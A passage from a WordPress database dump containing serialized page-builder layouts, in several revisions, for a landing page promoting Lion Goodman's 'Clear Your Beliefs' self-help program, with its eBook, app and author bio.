like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="size-full wp-image-1489 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(979, 1491, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:425:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2730:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" data-wp-imgselect="1" /></a></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(988, 1498, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:258:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n[Form id="10"]\n</center>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(980, 1492, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:468:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center></center><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p>[vfb id=''2'']</p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a><br /> <br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(981, 1493, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:434:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n[vfb id=''3'']\n\n<a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a>\n</center>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> 